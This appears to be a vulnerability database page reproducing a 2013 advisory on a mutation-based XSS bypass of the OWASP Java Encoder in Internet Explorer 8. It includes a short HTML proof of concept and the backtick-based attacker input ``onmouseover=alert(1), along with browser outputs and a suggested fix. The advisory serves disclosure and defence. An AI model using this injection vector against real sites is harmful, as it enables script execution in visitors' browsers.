Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OWASP Java Encoder Filter Bypass

🗓️ 06 Nov 2013 00:00:00Reported by Rafay BalochType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

OWASP Java Encoder XSS Bypass Vulnerabilit

Code
`*#Product: OWASP Java Encoder*  
*#Vulnerability: Mutation Based XSS Bypass *  
*#Impact: Medium/Limited*  
*#Authors: Rafay Baloch And Alex Infuhr*  
*#Company: RHAinfoSEC *  
*#Website: http://services.rafayhackingarticles.net  
<http://services.rafayhackingarticles.net>*  
*#Status: To be fixed in the next release*  
  
*=========*  
*Description*  
*=========*  
  
Owasp encoder is an encoding library, that attempts to protect the website  
users by encoding any un-trusted input before it's reflected back.  
  
*=========*  
*Vulnerability*  
*==========*  
  
The issue occurs inside of internet explorer only because treats accent  
grave ` as a delimiter character, and we can escape out of a valid  
attribute inside of an un-patched IE 8, since it does not put double quotes  
around our vector when it's returned via innerHTML property.  
  
*=============*  
*Proof of concept*  
*=============*  
  
Here is the POC that came by slightly modifying the following example at  
html5sec.org#59.  
  
The POC was tested in Internet explorer version 8:  
<html>  
<head>  
</head>  
<div id="a"><input value="``onmouseover=alert(1)"></div>  
<div id="b"></div>  
<script>b.innerHTML=a.innerHTML</script>  
</html>  
  
*Attacker's Input:*  
  
``onmouseover=alert(1)  
  
*Vulnerable Browsers Output:*  
  
<div id="a"><input value=``onmouseover=alert(1)></div>  
  
*Patched Browsers Output:*  
  
<div id="a"><input value="``onmouseover=alert(1)"></div>  
  
When the above POC is tested inside of an unpatched Internet explorer 8, it  
was noticed that IE 8 does not places quotes around it when it's rendered  
by innerHTML property. However, When placed in a patched version of  
internet explorer, it places double quotes around when the string is  
returned back to the user, hence stopping the attack.  
  
*===*  
*Fix*  
*===*  
  
Currently, I am not aware of any other solutions then stripping out the  
accent grave character, encoding doesn't seems to solve the problem here.  
  
*==========*  
*References*  
*==========*  
  
http://html5sec.org/#59  
http://www.slideshare.net/x00mario/the-innerhtml-apocalypse  
https://cure53.de/fp170.pdf  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Nov 2013 00:00Current
owasp java encoderxss bypassmutation basedrafay balochalex infuhrrhainfosecinternet explorerhtml injectionpocvulnerable browserspatched browsersinnerhtmlinternet explorer 8mitigation optionsreferences
27